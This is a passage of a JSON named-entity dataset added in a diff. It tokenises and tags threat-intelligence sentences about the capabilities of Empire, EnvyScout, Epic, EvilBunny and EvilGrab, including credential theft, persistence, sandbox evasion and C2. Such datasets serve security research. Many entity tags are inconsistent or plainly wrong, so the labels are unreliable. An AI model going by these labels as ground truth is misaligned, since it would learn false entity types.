+ "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "includes", + "keylogging", + "capabilities", + "for", + "Windows,", + "Linux,", + "and", + "macOS", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Tool", + "B-Features", + "O", + "O", + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "Inveigh", + "to", + "conduct", + "name", + "service", + "poisoning", + "for", + "credential", + "theft", + "and", + "associated", + "relay", + "attacks." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Empire", + "contains", + "an", + "implementation", + "of", + "Mimikatz", + "to", + "gather", + "credentials", + "from", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "acquire", + "local", + "and", + "domain", + "user", + "account", + "information." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "has", + "a", + "module", + "for", + "creating", + "a", + "local", + "user", + "if", + "permissions", + "allow." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Features", + "B-Purp", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "has", + "the", + "ability", + "to", + "collect", + "emails", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "built-in", + "modules", + "to", + "abuse", + "trusted", + "utilities", + "like", + "MSBuild.exe." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Empire", + "contains", + "a", + "variety", + "of", + "enumeration", + "modules", + "that", + "have", + "an", + "option", + "to", + "use", + "API", + "calls", + "to", + "carry", + "out", + "tasks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "perform", + "port", + "scans", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "find", + "shared", + "drives", + "on", + "the", + "local", + "system." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "be", + "used", + "to", + "conduct", + "packet", + "captures", + "on", + "target", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "perform", + "pass", + "the", + "hash", + "attacks." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Empire", + "contains", + "modules", + "that", + "can", + "discover", + "and", + "exploit", + "path", + "interception", + "opportunities", + "in", + "the", + "PATH", + "environment", + "variable." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "contains", + "modules", + "that", + "can", + "discover", + "and", + "exploit", + "search", + "order", + "hijacking", + "vulnerabilities." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "contains", + "modules", + "that", + "can", + "discover", + "and", + "exploit", + "unquoted", + "path", + "vulnerabilities." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Exp" + ] + }, + { + "tokens": [ + "Empire", + "leverages", + "PowerShell", + "for", + "the", + "majority", + "of", + "its", + "client-side", + "agent", + "tasks.", + "Empire", + "also", + "contains", + "the", + "ability", + "to", + "conduct", + "PowerShell", + "remoting", + "with", + "the", + "<code>Invoke-PSRemoting</code>", + "module." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "modules", + "like", + "<code>Invoke-SessionGopher</code>", + "to", + "extract", + "private", + "key", + "and", + "session", + "information." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "find", + "information", + "about", + "processes", + "running", + "on", + "local", + "and", + "remote", + "systems." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "contains", + "multiple", + "modules", + "for", + "injecting", + "into", + "processes,", + "such", + "as", + "<code>Invoke-PSInject</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "modify", + "the", + "registry", + "run", + "keys", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "and", + "<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "for", + "persistence." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "add", + "a", + "SID-History", + "to", + "a", + "user", + "if", + "on", + "a", + "domain", + "controller." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "contains", + "modules", + "for", + "executing", + "commands", + "over", + "SSH", + "as", + "well", + "as", + "in-memory", + "VNC", + "agent", + "injection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Empire", + "has", + "modules", + "to", + "interact", + "with", + "the", + "Windows", + "task", + "scheduler." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "is", + "capable", + "of", + "capturing", + "screenshots", + "on", + "Windows", + "and", + "macOS", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "enumerate", + "antivirus", + "software", + "on", + "the", + "target." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "enumerate", + "Security", + "Support", + "Providers", + "(SSPs)", + "as", + "well", + "as", + "utilize", + "PowerSploit's", + "<code>Install-SSP</code>", + "and", + "<code>Invoke-Mimikatz</code>", + "to", + "install", + "malicious", + "SSPs", + "and", + "log", + "authentication", + "events." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Org", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "PsExec", + "to", + "execute", + "a", + "payload", + "on", + "a", + "remote", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "persist", + "by", + "modifying", + "a", + ".LNK", + "file", + "to", + "include", + "a", + "backdoor." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "leverage", + "its", + "implementation", + "of", + "Mimikatz", + "to", + "obtain", + "and", + "use", + "silver", + "tickets." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "enumerate", + "host", + "system", + "information", + "like", + "OS,", + "architecture,", + "domain", + "name,", + "applied", + "patches,", + "and", + "more." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "acquire", + "network", + "configuration", + "information", + "like", + "DNS", + "servers,", + "public", + "IP,", + "and", + "network", + "proxies", + "used", + "by", + "a", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "B-Tool", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "enumerate", + "the", + "current", + "network", + "connections", + "of", + "a", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "enumerate", + "the", + "username", + "on", + "targeted", + "hosts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "timestomp", + "any", + "files", + "or", + "payloads", + "placed", + "on", + "a", + "target", + "machine", + "to", + "help", + "them", + "blend", + "in." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "capture", + "webcam", + "data", + "on", + "Windows", + "and", + "macOS", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "conduct", + "command", + "and", + "control", + "over", + "protocols", + "like", + "HTTP", + "and", + "HTTPS." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Empire", + "has", + "modules", + "for", + "executing", + "scripts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "WMI", + "to", + "deliver", + "a", + "payload", + "to", + "a", + "remote", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "utilize", + "built-in", + "modules", + "to", + "modify", + "service", + "binaries", + "and", + "restore", + "them", + "to", + "their", + "original", + "state." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "can", + "collect", + "sensitive", + "NTLM", + "material", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "can", + "deobfuscate", + "and", + "write", + "malicious", + "ISO", + "files", + "to", + "disk." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "can", + "Base64", + "encode", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "can", + "call", + "<code>window.location.pathname</code>", + "to", + "ensure", + "that", + "embedded", + "files", + "are", + "being", + "executed", + "from", + "the", + "C:", + "drive,", + "and", + "will", + "terminate", + "if", + "they", + "are", + "not." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "can", + "use", + "protocol", + "handlers", + "to", + "coax", + "the", + "operating", + "system", + "to", + "send", + "NTLMv2", + "authentication", + "responses", + "to", + "attacker-controlled", + "infrastructure." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "contains", + "JavaScript", + "code", + "that", + "can", + "extract", + "an", + "encoded", + "blob", + "from", + "its", + "HTML", + "body", + "and", + "write", + "it", + "to", + "disk." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "can", + "use", + "hidden", + "directories", + "and", + "files", + "to", + "hide", + "malicious", + "executables." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "can", + "write", + "files", + "to", + "disk", + "with", + "JavaScript", + "using", + "a", + "modified", + "version", + "of", + "the", + "open-source", + "tool", + "FileSaver." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "EnvyScout", + "has", + "been", + "executed", + "through", + "malicious", + "files", + "attached", + "to", + "e-mails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "EnvyScout", + "has", + "used", + "folder", + "icons", + "for", + "malicious", + "files", + "to", + "lure", + "victims", + "into", + "opening", + "them." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "has", + "the", + "ability", + "to", + "proxy", + "execution", + "of", + "malicious", + "files", + "with", + "Rundll32." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "has", + "been", + "distributed", + "via", + "spearphishing", + "as", + "an", + "email", + "attachment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "can", + "determine", + "whether", + "the", + "ISO", + "payload", + "was", + "received", + "by", + "a", + "Windows", + "or", + "iOS", + "device." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EnvyScout", + "can", + "use", + "cmd.exe", + "to", + "execute", + "malicious", + "files", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "encrypts", + "collected", + "data", + "using", + "a", + "public", + "key", + "framework", + "before", + "sending", + "it", + "over", + "the", + "C2", + "channel.", + "Some", + "variants", + "encrypt", + "the", + "collected", + "data", + "with", + "AES", + "and", + "encode", + "it", + "with", + "base64", + "before", + "transmitting", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "compresses", + "the", + "collected", + "data", + "with", + "bzip2", + "before", + "sending", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "valid", + "digital", + "certificates", + "from", + "Sysprint", + "AG", + "to", + "sign", + "its", + "Epic", + "dropper." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-SecTeam", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Epic", + "has", + "overwritten", + "the", + "function", + "pointer", + "in", + "the", + "extra", + "window", + "memory", + "of", + "Explorer's", + "Shell_TrayWnd", + "in", + "order", + "to", + "execute", + "malicious", + "code", + "in", + "the", + "context", + "of", + "the", + "explorer.exe", + "process." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Epic", + "has", + "a", + "command", + "to", + "delete", + "a", + "file", + "from", + "the", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "recursively", + "searches", + "for", + "all", + ".doc", + "files", + "on", + "the", + "system", + "and", + "collects", + "a", + "directory", + "listing", + "of", + "the", + "Desktop,", + "%TEMP%,", + "and", + "%WINDOWS%\\Temp", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Epic", + "gathers", + "a", + "list", + "of", + "all", + "user", + "accounts,", + "privilege", + "classes,", + "and", + "time", + "of", + "last", + "logon." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "gathers", + "information", + "on", + "local", + "group", + "names." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "heavily", + "obfuscates", + "its", + "code", + "to", + "make", + "analysis", + "more", + "difficult." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "uses", + "the", + "<code>tasklist", + "/v</code>", + "command", + "to", + "obtain", + "a", + "list", + "of", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "uses", + "the", + "<code>rem", + "reg", + "query</code>", + "command", + "to", + "obtain", + "values", + "from", + "Registry", + "keys." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "uses", + "the", + "<code>net", + "view</code>", + "command", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "searches", + "for", + "anti-malware", + "services", + "running", + "on", + "the", + "victim’s", + "machine", + "and", + "terminates", + "itself", + "if", + "it", + "finds", + "them." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "encrypts", + "commands", + "from", + "the", + "C2", + "server", + "using", + "a", + "hardcoded", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "collects", + "the", + "OS", + "version,", + "hardware", + "information,", + "computer", + "name,", + "available", + "system", + "memory", + "status,", + "disk", + "space", + "information,", + "and", + "system", + "and", + "user", + "language", + "settings." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "uses", + "the", + "<code>nbtstat", + "-n</code>", + "and", + "<code>nbtstat", + "-s</code>", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "uses", + "the", + "<code>net", + "use</code>,", + "<code>net", + "session</code>,", + "and", + "<code>netstat</code>", + "commands", + "to", + "gather", + "information", + "on", + "network", + "connections." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "collects", + "the", + "user", + "name", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "uses", + "the", + "<code>tasklist", + "/svc</code>", + "command", + "to", + "list", + "the", + "services", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "uses", + "the", + "<code>net", + "time</code>", + "command", + "to", + "get", + "the", + "system", + "time", + "from", + "the", + "machine", + "and", + "collect", + "the", + "current", + "date", + "and", + "time", + "zone", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Epic", + "uses", + "HTTP", + "and", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "exploited", + "CVE-2011-4369,", + "a", + "vulnerability", + "in", + "the", + "PRC", + "component", + "in", + "Adobe", + "Reader." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "deleted", + "the", + "initial", + "dropper", + "after", + "running", + "through", + "the", + "environment", + "checks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "downloaded", + "additional", + "Lua", + "scripts", + "from", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "used", + "various", + "API", + "calls", + "as", + "part", + "of", + "its", + "checks", + "to", + "see", + "if", + "the", + "malware", + "is", + "running", + "in", + "a", + "sandbox." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "used", + "EnumProcesses()", + "to", + "identify", + "how", + "many", + "process", + "are", + "running", + "in", + "the", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "created", + "Registry", + "keys", + "for", + "persistence", + "in", + "<code>[HKLM|HKCU]\\…\\CurrentVersion\\Run</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "executed", + "commands", + "via", + "scheduled", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "been", + "observed", + "querying", + "installed", + "antivirus", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny's", + "dropper", + "has", + "checked", + "the", + "number", + "of", + "processes", + "and", + "the", + "length", + "and", + "strings", + "of", + "its", + "own", + "file", + "name", + "to", + "identify", + "if", + "the", + "malware", + "is", + "in", + "a", + "sandbox", + "environment." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "used", + "the", + "API", + "calls", + "NtQuerySystemTime,", + "GetSystemTimeAsFileTime,", + "and", + "GetTickCount", + "to", + "gather", + "time", + "metrics", + "as", + "part", + "of", + "its", + "checks", + "to", + "see", + "if", + "the", + "malware", + "is", + "running", + "in", + "a", + "sandbox." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "used", + "time", + "measurements", + "from", + "3", + "different", + "APIs", + "before", + "and", + "after", + "performing", + "sleep", + "operations", + "to", + "check", + "and", + "abort", + "if", + "the", + "malware", + "is", + "running", + "in", + "a", + "sandbox." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "executed", + "C2", + "commands", + "directly", + "via", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "an", + "integrated", + "scripting", + "engine", + "to", + "download", + "and", + "execute", + "Lua", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilBunny", + "has", + "used", + "WMI", + "to", + "gather", + "information", + "about", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilGrab", + "has", + "the", + "capability", + "to", + "capture", + "audio", + "from", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilGrab", + "has", + "the", + "capability", + "to", + "capture", + "keystrokes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "EvilGrab", + "adds", + "a", + "Registry", + "Run", + "key", + "for", + "ctfmon.exe", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EvilGrab", + "has", + "the", + "capability", + "to", + "capture", + "screenshots." + ], + 